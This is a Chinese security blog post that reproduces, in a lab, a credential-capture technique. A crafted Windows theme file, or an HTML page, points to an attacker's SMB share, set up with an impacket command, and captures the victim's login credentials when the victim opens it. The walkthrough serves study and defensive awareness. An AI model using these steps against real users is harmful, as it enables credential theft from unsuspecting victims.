SongShuA

SongShuA

胸中梦黄粱,手握自在心 一个充满想法的网络安全从业人员 A person with dreams in their heart and the ability to control their own destiny, who is a creative professional in the field of cybersecurity.
github

初探基于windows主题的哈希传递攻击(更正:这玩意不算pth)

近期看到嘶吼发的一篇文章

1770731526.png

很感兴趣,于是决定试一试。根据文章中所说的信息进行了复现,记录一下复现过程。

#

复现过程

攻击机:kali 192.168.233.128

靶机:win server 2012 192.168.233.130

            win10 192.168.233.1

首先制作恶意主题包

右击桌面,选择到主题,选择已应用的主题,右击导出主题文件

146917008.png

1403727867.png

导出文件为 deskthemepack 后缀。使用压缩文件打开该文件获得 theme 文件

3727299131.png

用文本编辑器打开 theme 文件,来到 [Control Panel\Desktop] 块下面,找到 Wallpaper 参数。利用地点就在这里。这里规定了壁纸的引用地址,可以是本地文件也可以是一个网络地址。而网络地址又支持多种协议。所以就功能来讲确实不算是漏洞,微软拒绝修复也很正常。

我们将 Wallpaper 的值设置为一个 SMB 共享文件 192.168.233.128\a\shell.png   (攻击者开启的 smb 服务)

4002500489.png

然后保存。进入 kali 开启 smb 服务。我们可以使用 impacket 进行快速搭建服务。impacket 具体用法请自行百度

impacket-smbserver a pwd

如果失败记得加上 sudo

1011441943.png

开启成功后模拟被害者操作

双击 theme 文件安装主题,这个时候 kali 里面就会收到用户的凭据信息
2553524607.png

注意:SMB 服务器一定要在正常运行,不然靶机会桌面无响应。

这就是整个攻击流程。其实最本质的思想就是在一些无需授权的功能处访问无密码 smb 资源时会默认传递系统自己的凭据信息。将这个思路扩大还有其他玩法。比如近些年火热的动态壁纸软件 wallpaper engine 也有一个外部资源访问的功能

1382035015.png

这个也可以利用

还有什么呢?其实 html 也可以。正好在 win server 中没有主题这个玩意,于是便可以利用 html 进行攻击

584234132.png

访问恶意 html 文件

852101111.png

smb 服务器同样收到了凭据信息

1766528124.png

至此两台靶机全都攻击成功。

最后想一想其实可以攻击的手段还有很多,只要是远程资源,自动访问,都可以进行这个攻击。但是在实验时发现了问题,445 端口在网络运营商那一层就被屏蔽掉了,据说是为了防御永恒之蓝。win 系统又不支持非标准 smb 访问,所以这个手法在国内大概只能用于内网了吧。国外环境因为复现麻烦就没再尝试。

END

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。